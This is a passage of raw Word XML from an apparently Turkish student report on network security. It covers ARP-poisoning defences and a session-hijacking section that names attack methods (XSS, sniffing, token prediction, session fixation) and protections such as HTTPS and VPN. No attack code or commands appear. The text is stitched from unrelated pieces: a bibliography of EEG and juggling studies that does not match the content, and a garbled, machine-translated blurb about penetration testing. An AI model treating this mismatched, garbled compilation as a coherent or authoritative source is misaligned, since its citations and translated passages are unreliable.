    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="355"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Ayrıca, anahtarlar keskin nişancılarla yapılan saldırıları ortadan kaldırmazken, değişimli bir ortam , özellikle dikkatlice yapılandırılmışsa, saldırganın seçeneklerini sınırlamaya yardımcı olabilir . DMZ'leriniz ve diğer kritik ağlar için, bir anahtar kullanmalı ve LAN'daki her ana bilgisayardaki tüm ARP girişlerini kodlamalısınız. LAN'ınızdaki her sistem, LAN'daki diğer makinelerin IP ve MAC adresleri hakkında bilgi tutan bir ARP önbelleğine sahiptir . Hassas LAN'larınızdaki tüm ARP girişlerini statik olacak şekilde kodlayarak , </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ARP önbelleğe alınmış zehirlenme olasılığını en aza indirmiş olursunuz Ek olarak, anahtarınızda bağlantı noktası düzeyinde güvenlik sağlayın, böylece anahtarla yalnızca belirli Ethernet MAC adresleri iletişim kurabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc10000244"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OTURUM ÇALMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Oturum çalma, siber korsanların bilgisayarınızdaki bilgilere ve kullanmış olduğunuz servislere yetkisiz erişim sağlamak için başvurduğu bir siber saldırı yöntemidir. Çerez çalma olarak da bilinen oturum çalma, farkında bile olmadığınız bir anda bilgilerinizin siber korsanların eline geçmesine neden olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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 xml:space="preserve">Oturum çalmanın ne olduğunu anlamamız için öncelikle oturumun ne olduğunu anlamamız gerekiyor. Herhangi bir servise bağlanmak istediğinizde, bildiğiniz gibi sizden kullanıcı adınız ve parolanız istenir. Bu bilgiler girilip </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>servisteki kayıtlarla eşleştirildikten sonra servis sunucusu, bir oturum kimliği ya da çerez oluşturarak tarayıcınıza gönderir. Böylece oturum açmış olursunuz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="218" w:line="221" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bu oturum kimlikleri, oturuma özel oluşturulur ve aynı serviste yeni bir oturum açmaya çalıştığınızda oturum kimliğiniz de değişir. Siber korsanlar, siteler arası komut dosyası saldırısı, oturum paket çözümleme, oturum belirteci tahmin etme ya da oturum sabitleme gibi yöntemler kullanarak oturum kimliğinizi çalabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Oturum çalma, gün içinde onlarca web siteye girip çıktığımızı düşünürsek kolaylıkla gerçekleştirilebilir fakat gerekli önlemler alındığında oturum kimliğinizi korumak oldukça kolaydır. Oturum çalmadan korunmak için en çok kullanılan yöntemler veri şifreleme, rastgele oturum kimliği, VPN kullanma, yenilenen oturum kimliği ve çerez rastgeleleştirmedir.</w:t>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583" w:right="1384" w:bottom="1464" w:left="976" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2422"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7296150" cy="24193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296150" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="218" w:line="221" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Özellikle VPN kullanmak, oturum çalmadan kaçınmanın mükemmel bir yoludur. </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0563C1"/>
          </w:rPr>
          <w:t>VPNpro</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0563C1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0563C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>gibi kaliteli bir VPN servisi, yüksek seviye şifreleme ve trafik yönlendirmesi kullanacağından sunucu ile kullanıcı arasındaki veri iletişimi tamamen güvenli hale getirilerek oturum çalmaya karşı maksimum önlem alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="148" w:line="221" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Günümüzde pek çok web site HTTPS gibi güvenlik protokollerine geçiş yaparak oturum çalma saldırılarına karşı maksimum önlem alıyor. Kullanıcı tarafında alınabilecek en iyi önlem ise şu an için </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">VPN kullanmak </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>gibi görünüyor. Çevrimiçi ortamda dolaşırken güvenliğe dikkat etmek oldukça önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidSect="005421E3">
          <w:pgSz w:w="10800" w:h="19200"/>
          <w:pgMar w:top="1602" w:right="1440" w:bottom="1464" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1884"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5772150" cy="4427220"/>
            <wp:effectExtent l="5715" t="0" r="5715"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5772150" cy="4427220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc10000827"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>KAYNAKÇA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ahmedian, P., Cagnoni, S., and Ascari, L. 2013. How capable is non-invasive EEG data of predicting the next movement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">A mini review. Front. Hum. Neurosci. 7 (124). Allison, B. Z., and Neuper, C. 2010. Could anyone use a BCI? In Brain–Computer Interfaces. 35–54. London: Springer-Verlag. Beek, P. J., and Santvoord, A. V. 1992. Learning the cascade juggle: A dynamical systems analysis. J. Motor Behav. 4 (1): 85–94. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Bertrand, A., Mihajlović, V., Grundlehner, B., Van Hoof, C., and Moonen, M. 2013. Motion artifact reduction in EEG recordings using multi-channel contact impedance measurements. IEEE Biomedical </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Circuits and Systems Conference (BioCAS) 258–261. Bink, M., van Boxtel, G., Popma, A., Bongers, I., Denissen, A., and van Nieuwenhuizen, C. 2015. EEG theta and beta power spectra in adolescents with ADHD versus adolescents with ASD + ADHD. Eur. Child Adolesc. Psychiatry 24: 873–886. Bovermann, T., </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Groten, J., De Campo, A., et al. Juggling sounds. 2007. Proceedings of the 2nd International </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Workshop on Interactive Sonification. Chen, Y. H., Op de Beeck, M., Vanderheyden, L., Carrette, E., Mihajlović, V., Vanstreels, K., Grundlehner, B., Gadeyne, S., Boon, P., and Van Hoof, C. 2014. </w:t>
      </w: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 w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0E6433" wp14:editId="5226E399">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="Resim 51"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Default="00E77DF4" w:rsidP="00E77DF4"/>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1.6.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>-1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>6.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Yakup AFŞAR</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30757057</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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15</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D. Fried CISSP</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konusuna genel bir giriş yapan ve güvenlik analizi bu özel bölgeyi anl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">amak için gerekli arka plan ile </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uzmanına sağlar. Penetrasyon testleri anlayış ve bir bilgisayarın veya ağın güvenliğini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> artırmak için değerli bir araç </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aynı zamanda sistem zayıflıklarını ve saldırı sistemleri yararlanmak ve değerli bilgileri çalmak için kullanı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leri için gereğini ve bunun kullanımını çevreleyen sorunları ve süreçleri anla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yarak, bir güvenlik profesyonel </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setinin standart bir parçası olarak penetrasyon testi kullanmak daha iyi olac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mı, uygulama ve süreç açısından penetrasyon testi sunar. Bu penetras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yon özgül sistemleri test etmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>özgül tekniklerine derinlemesine bir kılavuz olarak uygun değildir. Penetrasyon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> testleri beceri büyük bir alan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pratik bir sanattır. Doğru ve dikkatli yapılmamışsa, penetrasyon testi (en iyi) geç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ersiz sayılır edilebilir ve, en </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aslında hedef sistemlerine zarar. Güvenlik profesyonel penetrasyon test araçları </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
